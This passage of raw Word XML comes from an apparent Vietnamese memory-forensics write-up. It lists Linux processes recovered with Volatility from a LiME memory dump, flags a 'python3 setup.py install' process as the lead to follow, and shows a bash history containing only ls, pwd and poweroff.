    <w:p w14:paraId="2C4FD6D6" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">31     0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>kworker/u2:1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF19474" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">32     0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>kworker/0:1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D8EF46" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">34     0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>kswapd0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28600EB2" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">35     0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>kworker/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>u3</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>:0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08209A55" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">36     0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>ecryptfs-kthrea]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CD7649" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">78     0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>kthrotld]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163FAC55" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">79     0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>acpi_thermal_pm]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C2FC3E" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">80     0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>scsi_eh_0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A539551" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">81     0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>scsi_tmf_0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43940025" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">82     0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>scsi_eh_1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD65C5E" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">83     0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>scsi_tmf_1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA23C37" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">84     0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>kworker/u2:2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53ED016A" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">85     0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>kworker/u2:3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465C2E07" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">89     0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>ipv6_addrconf]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595E994F" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">98     0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>kstrp]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2C5294" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">115    0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>charger_manager]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4868BA4D" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">116    0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>kworker/0:2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C00133" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">166    0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>kworker/0:3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FAEA95" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">192    0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>kworker/0:1H]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2905FCB8" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">214    0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>scsi_eh_2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BCE739" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">215    0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>scsi_tmf_2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFF6162" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">216    0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>ttm_swap]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5247A0C0" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">217    0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>irq/18-vmwgfx]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EECFC7" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">225    0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>kdmflush]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A5B999" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">226    0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>bioset]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CDCDD0" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">300    0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>raid5wq]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465D9D59" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">361    0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>jbd2/dm-0-8]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106A31AE" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">362    0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>ext4-rsv-conver]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5500AB96" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t>432    0      0      /lib/systemd/systemd-journald</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C38F5B" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">439    0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>iscsi_eh]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5F6530" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">443    0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>ib-comp-wq]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B98EB9" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">444    0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>ib-comp-unb-wq]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A51018" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">446    0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>ib_mcast]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44674E19" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">447    0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>ib_nl_sa_wq]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2BE5B4" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t>449    0      0      /lib/systemd/systemd-udevd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11181551" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">451    0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>rdma_cm]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F67F9E" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t>471    0      0      /sbin/lvmetad -f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028ABD46" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">477    0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>iprt-VBoxWQueue]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8BD6FC" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">614    0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>jbd2/sda2-8]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C35000" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">615    0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>ext4-rsv-conver]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E0E14D" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">628    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>62583  62583</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">  /lib/systemd/systemd-timesyncd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332FFD86" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t>725    100    102    /lib/systemd/systemd-networkd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531DBA25" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t>742    101    103    /lib/systemd/systemd-resolved</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367B0DAF" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t>819    0      0      /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C8D029" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t>820    0      0      /usr/bin/lxcfs /var/lib/lxcfs/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E689B7" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t>823    0      0      /usr/sbin/atd -f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023DFCA3" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t>836    0      0      /usr/sbin/cron -f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F11B3D0" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t>840    0      0      /usr/lib/accountsservice/accounts-daemon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052BE7B1" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t>841    102    106    /usr/sbin/rsyslogd -n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00643377" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t>851    103    107    /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F171E9F" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t>857    0      0      /lib/systemd/systemd-logind</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FE6AB1" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t>863    0      0      /usr/sbin/sshd -D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4FE19E" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t>877    0      1000   /bin/login -p --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768F31A7" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t>878    0      0      /usr/lib/policykit-1/polkitd --no-debug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E70C9E7" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t>880    0      0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FE9508" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>1273   1000   1000   /lib/systemd/systemd --user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA84652" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t>1274   1000   1000</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   (</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>sd-pam)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9E9FB7" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t>1295   1000   1000   -bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066206ED" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t>1342   0      0      sudo insmod lime-4.15.0-184-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>generic.ko</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> path=../dump.mem format=lime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B06499" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t>1344   0      0      sshd: developer [priv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F102BC0" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t>1419   1000   1000   sshd: developer@pts/0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6B73CA" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t>1420   1000   1000   -bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7745DCC7" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t>1451   1000   1000   python3 setup.py install</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD01201" w14:textId="4E33BAAC" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t>1452   0      0      insmod lime-4.15.0-184-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>generic.ko</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> path=../dump.mem format=lime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF4B326" w14:textId="72238EEE" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">Nhận xét </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364BDCFF" w14:textId="40C4F2A5" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r w:rsidRPr="00191F7F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E9D7503" wp14:editId="4CBBB31B">
            <wp:extent cx="5943600" cy="3112135"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="78326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3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BD24" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRPr="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r w:rsidRPr="00191F7F">
        <w:t>Kết quả cho thấy insmod đang nạp module lime-4.15.0-184-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00191F7F">
        <w:t>generic.ko</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00191F7F">
        <w:t xml:space="preserve"> để tạo file dump.mem, nên đây là tiến trình phục vụ thu thập bộ nhớ, không phải dấu hiệu tấn công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239DF5EE" w14:textId="2443B14C" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r w:rsidRPr="00191F7F">
        <w:t xml:space="preserve">Ngược lại, tiến trình python3 PID 1451 đang chạy lệnh python3 setup.py install dưới user developer. Đây là </w:t>
      </w:r>
      <w:r>
        <w:t>process</w:t>
      </w:r>
      <w:r w:rsidRPr="00191F7F">
        <w:t xml:space="preserve"> cần ưu tiên </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C6DD37" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRPr="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r w:rsidRPr="00191F7F">
        <w:t xml:space="preserve">Tiếp theo cần kiểm tra </w:t>
      </w:r>
      <w:r w:rsidRPr="00191F7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bash history</w:t>
      </w:r>
      <w:r w:rsidRPr="00191F7F">
        <w:t xml:space="preserve"> để biết user developer đã chạy lệnh gì trước khi xuất hiện:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5221804A" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRPr="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r w:rsidRPr="00191F7F">
        <w:t>python3 setup.py install</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BB35B5" w14:textId="0C794178" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r w:rsidRPr="00191F7F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">vol2 -f dump.mem --profile=LinuxUbuntu_4_15_0-184-generic_profilex64 linux_bash </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453D85C8" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t>Pid      Name                 Command Time                   Command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644224EB" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t>-------</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>- -</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>------------------</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>- -</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>----------------------------- -------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588F2E5A" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">    1295 bash                 2022-06-16 07:17:08 UTC+0000   ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F20A84" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">    1295 bash                 2022-06-16 07:17:08 UTC+0000   pwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8A18EE" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">    1295 bash                 2022-06-16 07:17:08 UTC+0000   sudo poweroff</w:t>
      </w:r>
    </w:p>
